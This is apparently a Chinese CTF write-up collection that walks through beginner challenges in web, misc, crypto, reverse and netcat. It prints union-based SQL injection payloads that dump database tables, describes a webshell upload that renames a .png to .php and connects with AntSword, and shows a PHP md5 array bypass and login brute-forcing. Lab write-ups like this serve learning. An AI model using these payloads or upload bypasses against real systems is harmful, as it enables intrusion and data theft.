目录
flag在哪
1.启动场景
2.查看页面源代码,找到flag
传个参吧
1.打开环境
2.查看页面源代码,提示传的参数应该是hint,在url上加上/?hint=1
3.得到如下界面
4.使用hackbar进行post传参,得到flag
easy-upload
1.启动环境
2.上传一句话木马的png文件,使用bp抓包,把1.png文件改成1.php文件,forward放包,显示1.php文件上传成功
3.使用蚁剑连接
4.在根目录下找到flag
boom!
1.启动环境,得到如下界面
2.知道需要使用bp爆破,一开始使用很多字典无法爆破成功,后来得到提示显示说是师兄的学号202122804101到202122804199之间,先随便输入一个密码,使用bp抓包,send to intruder
3.确定爆破位置为密码,字典是数字
3.爆破得到202122804177的返回长度不一样,则说明这个是密码
4.输入密码得到flag
easy-include
1.启动场景
2.查看页面源代码
3文件包含,在url中上传参数
4.查看源代码,获得flag
easy-upload
1.上传一句话木马的png格式,用bp抓包,把文件名修改成1.php,forward放包
2.使用蚁剑连接,在根目录下得到flag
easy-rce
1.启动环境,用ls查看当前目录
2.查看源代码,发现有1.jpg,index.php,rce.css
2.查看根目录,找到flag所在文件
3.用cat打开flag文件,可是发现cat被过滤,用more代替
4.查看源代码,找到flag
easy-php
1.启动环境
2.题目所给意思是传参方式为get,a和b的md5加密值相等,但是a和b的值不一样,a不等于2023但是a的第一个字符取整后是2023
在url中传参/?0[]=2023a&1[]=1,得到flag
徐江的嘲讽
伪加密:
在50 4B 03 04 的区域叫压缩源文件数据区,在此03 04 的后3,4个字节byte处叫全局方式位标记
在50 4B 01 02 的区域叫压缩源文件目录区,在此01 02的后5.6个字节byte处也叫全局方式位标记
无加密
压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为00 00
假加密
压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为09 00
真加密
压缩源文件数据区的全局加密应当为09 00
且压缩源文件目录区的全局方式位标记应当为09 00
1.下载zip文件,发现打开flag.txt文件需要密码。用010editor打开查看是否是伪加密,发现504B0102的后56字节处为0900,是伪加密
2.把0900修改成0000,重新打开
3.得到flag
想看我驴哥吗
1.下载压缩包,发现解压需要用到密码,但是没有其他信息提供,因此使用archpr暴力破解密码,最大长度改为6,开始破解
2.得到密码604604
3.解压缩得到驴哥.jpg文件,查看属性
4.备注中的一串字符通过base64解码,得到flag
流量分析
1.下载文件,修改文件名为1.pcapng,在wireshark中打开此文件,追踪http流,查找flag文件
今天你学习了吗?
1.启动环境,图片下面有白边,需要修改高度
2.查看图片属性,发现像素为1024×1024,1024对应的16进制为400,用010editor打开图片,发现修改宽高的位置在第十行
3.把高度改成2500,转化成十六进制为09c4
4. 把高度改成09c4
5。重新打开图片,得到flag
life-story
1.下载压缩包后发现打不开,因为这个文件本来就不是一个压缩包,把文件拓展名写成.txt,打开后得到的是一串emoji表情
2.搜索emoji表情解密,得到一串编码
3.使用base32解密
4.再使用base64解密
5.用flag{}外包,得到flag
Music
使用MP3Stego工具:将隐写信息(如flag.txt)隐写在WAV格式音频文件中,然后经过压缩,加密,转换为MP3文件
加密:Encode.exe -E flag.txt -P password test.wav test.mp3
解密:Decode.exe -X -P 密码 test.mp3
1.下载文件,更改拓展名为mp3,并把此文件放到MP3Stego目录下,用cmd打开MP3Stego
输入命令Decode.exe -X -P nono music.mp3
2.生成music.mp3.txt,里面存在flag
怎么?只会贝斯拿不下你?
1.下载文件,得到一串字符
2.使用base32解密
3.使用base64解码,得到flag
简单的密码
1.下载txt文件,打开后发现都是社会主义核心价值观
2.搜索社会主义核心价值观解密,得到百家姓
3搜索百家姓解密,得到一串字符
4.选择后通过base16解密,得到flag
RSA
1.打开txt文件
2.使用rsa解密,e需要从十进制转换成十六进制,即65537转换成10001,calc.D,得到flag
5+n的凯撒密码
1.打开txt
2.寻找规律,密文的第一个字母a与解密后的f所对应的ascii值相差5,f与l相差6,以此类推,ascii码相差的值依次增大,写个python脚本
ord()函数就是用来返回单个字符的ascii值(0-255)
chr()函数是输入一个整数【0,255】返回其对应的ascii值
s='afZ_raY^WZUeSXQZOWLRKQINFPEHBLCCMSNBDS'
j=5
for i in s:
print(chr(ord(i)+j),end='')
j += 1
3.得到flag
easy-sql
1.需要知道表格有几列,如果报错则说明超过列数,经尝试发现为三列
-1'/**/order/**/by/**/3#
2.爆出显示位,发现表格第一列在页面显示
-1'/**/union/**/select/**/1,2,3#
3.获取当前数据名-1'/**/union/**/select/**/database(),2,3#,得到yunxi_exam库
4.子查询:-1'/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='yunxi_exam'),2,3#
就是在一个查询中还有其他若干查询,即在一个SELECT查询语句的FROM或WHERE字句中包含另一个SELECT查询语句,在这种嵌套的查询语句中,外层的SELECT查询语句称为主查询,WHERE或FROM中的查询语句称为子查询,也叫嵌套查询。通过子查询可以实现多表查询,子查询经常出现在WHERE或FROM字句中。
WHERE子句中的子查询:该位置处的子查询一般返回单行单列,多行单列,单行多列数据。就是返回能够作为WHERE子句查询条件的值。(子查询返回的值作为主查询的查询条件)
FROM子句中的子查询:该位置处的子查询一般返回多行多列数据,相当于是返回一张临时表,符合FROM子句后面是表的规则,就是通过这种方式来实现多表查询的。
5.爆字段名 -1'/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='bighacker'),2,3#
6.获得flag
-1'/**/union/**/select/**/group_concat(concat_ws(hack1,hack2,hack3)),2,3/**/from/**/bighacker#
re1
使用IDA32位打开,找到flag
nc
nc的全名是netcat,主要用途是建立和监听任意TCP和UDP连接,支持ivp4和ivp6.可用来网络调试和端口扫描等等
语法
nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]
参数说明:-g 设置路由器跃程通信网关,最多可设置8个。
-G 设置来源路由指向器,其数值为4的倍数。
-h 在线帮助。
-i 设置时间间隔,以便传送信息及扫描通信端口。
-l 使用监听模式,管控传入的资料。
-n 直接使用IP地址,而不通过域名服务器。
-o 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p 设置本地主机使用的通信端口。
-r 乱数指定本地与远端主机的通信端口。
-s 设置本地主机送出数据包的IP地址。
-u 使用UDP传输协议。
-v 显示指令执行过程。
-w 设置等待连线的时间。
-z 使用0输入/输出模式,只在扫描通信端口时使用。
1.下载文件,拖进kali虚拟机中
2.使用nc连接,得到flag